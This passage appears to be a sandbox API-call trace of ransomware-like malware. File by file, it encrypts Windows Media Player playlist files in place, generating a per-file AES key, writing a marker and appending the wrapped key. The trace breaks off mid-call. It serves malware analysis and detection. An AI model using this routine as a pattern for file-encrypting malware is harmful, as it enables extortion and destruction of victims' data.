(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.284] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=785) returned 1 [0142.284] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=785) returned 1 [0142.284] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x1ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.284] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.285] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.285] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.286] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.286] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.286] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x311, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x311, lpOverlapped=0x0) returned 1 [0142.286] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.286] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x311, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x320) returned 1 [0142.286] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.286] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x320, lpOverlapped=0x0) returned 1 [0142.286] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.286] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.286] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.286] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.286] CloseHandle (hObject=0x1a0) returned 1 [0142.303] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.307] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.307] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.307] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.307] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl", dwFileAttributes=0x80) returned 1 [0142.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.307] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1040) returned 1 [0142.307] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1040) returned 1 [0142.308] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.308] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.309] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.309] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.309] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.309] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.309] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x410, lpOverlapped=0x0) returned 1 [0142.309] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.309] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x410, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x420) returned 1 [0142.309] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.309] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x420, lpOverlapped=0x0) returned 1 [0142.309] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.309] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.309] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.310] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.310] CloseHandle (hObject=0x1a0) returned 1 [0142.326] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.330] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.330] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.330] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.330] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.330] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0142.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.332] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1020) returned 1 [0142.332] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1020) returned 1 [0142.332] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.332] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.333] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.333] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.333] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.333] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.333] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3fc, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x3fc, lpOverlapped=0x0) returned 1 [0142.334] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.334] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x3fc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x400) returned 1 [0142.334] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.334] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x400, lpOverlapped=0x0) returned 1 [0142.334] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.334] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.334] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.334] CloseHandle (hObject=0x1a0) returned 1 [0142.352] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.356] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.356] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.356] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.356] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.356] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl", dwFileAttributes=0x80) returned 1 [0142.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.357] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1025) returned 1 [0142.357] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1025) returned 1 [0142.357] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x2df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.357] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.358] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.358] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.358] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.358] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.358] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x401, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x401, lpOverlapped=0x0) returned 1 [0142.359] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.359] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x401, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x410) returned 1 [0142.359] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.359] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x410, lpOverlapped=0x0) returned 1 [0142.359] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.359] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.359] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.359] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.359] CloseHandle (hObject=0x1a0) returned 1 [0142.385] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.389] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.389] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.389] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.390] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl", dwFileAttributes=0x80) returned 1 [0142.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.390] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1063) returned 1 [0142.390] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1063) returned 1 [0142.390] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x305, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.390] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.391] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.391] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.392] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.392] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.392] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x427, lpOverlapped=0x0) returned 1 [0142.392] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.392] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x427, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x430) returned 1 [0142.392] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.392] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x430, lpOverlapped=0x0) returned 1 [0142.392] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.392] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.392] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.392] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.392] CloseHandle (hObject=0x1a0) returned 1 [0142.409] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.413] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.413] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.414] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.414] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl", dwFileAttributes=0x80) returned 1 [0142.415] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.415] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=585) returned 1 [0142.415] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=585) returned 1 [0142.415] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x127, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.415] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.416] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.416] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.416] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.416] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.416] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x249, lpOverlapped=0x0) returned 1 [0142.416] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.416] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x249, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x250) returned 1 [0142.416] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, 